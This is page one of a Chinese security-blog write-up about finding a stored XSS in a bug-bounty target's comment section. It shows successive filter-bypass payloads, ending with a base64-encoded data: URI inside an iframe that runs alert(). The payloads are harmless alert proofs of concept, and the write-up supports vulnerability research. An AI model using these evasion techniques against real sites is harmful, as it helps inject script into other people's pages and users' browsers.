欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

存储型XSS的发现经历和一点绕过思路

来源:本站整理 作者:佚名 时间:2019-09-02 TAG: 我要投稿

某SRC提现额度竟然最低是两千,而已经有750的我不甘心呐,这不得把这2000拿出来嘛。
之后我就疯狂的挖这个站,偶然发现了一个之前没挖出来的点,还有个存储型XSS
刚开始来到这个之前挖过但没挖出来的站,看了一下感觉这站没啥东西了啊,然后来到评论区又一次测试了一下
先简单测试一下
心态:随意吧
img src=0>

结果是一空的,啥也没有


普通的没用肯定是过滤了,想着直接抓包测试吧更快些
抓包后发现编码过
编码后:
%3Cimg+src%3D%22javascript%3Aalert('XSS')%22%3E
编码前:
img src="javascript:alert('XSS')">
有个javascript肯定是会拦截的,毕竟是大厂嘛

然后直接手打吧,去掉javascript
空格用+来表示吧
0>


虽然是空的,但是发现源码中是存在img的但是被转义了,还是有些转机的\^_^

心态:有点小郁闷
来尝试绕过转义
%00 代替空格
0%00>

继续绕过
#src=0>

再来!
img\/src=0>

有转机啊!可以看到 / 被转移成空格了
心态:兴奋
直接上
img/src=0/onerror=alert(/xss/)>

可惜,被拦截了,应该是关键字alert接触()就拦截,onerror接触=就拦截
绕过一下,加空格和 %00 会被转义,试着用 / 来空格,alert 用 top['alert']来代替
但是!不顶用啊
心态:失落

用过 /**/ %00 大小写 eval 等 常用的都被干掉了,结束了?!
这不一定要用  啊,来试试

心态:!!!柳暗花明又一村


接下来直接上吧,script标签肯定用不了了
试试
iframe/src=vbscript:msgbox(123)>iframe>

能写进去但是好像执行不了,继续绕
心态:坚持,执着,绞尽脑汁
试了各种绕的方法,突然想到 明着不行,那就来暗的
明码不行,那就试试base64编码后的看看它会拦截不
script>alert(/xss/)script>
 编码一下

来直接上
Payload iframe/src=data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=>iframe>

[1] [2]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载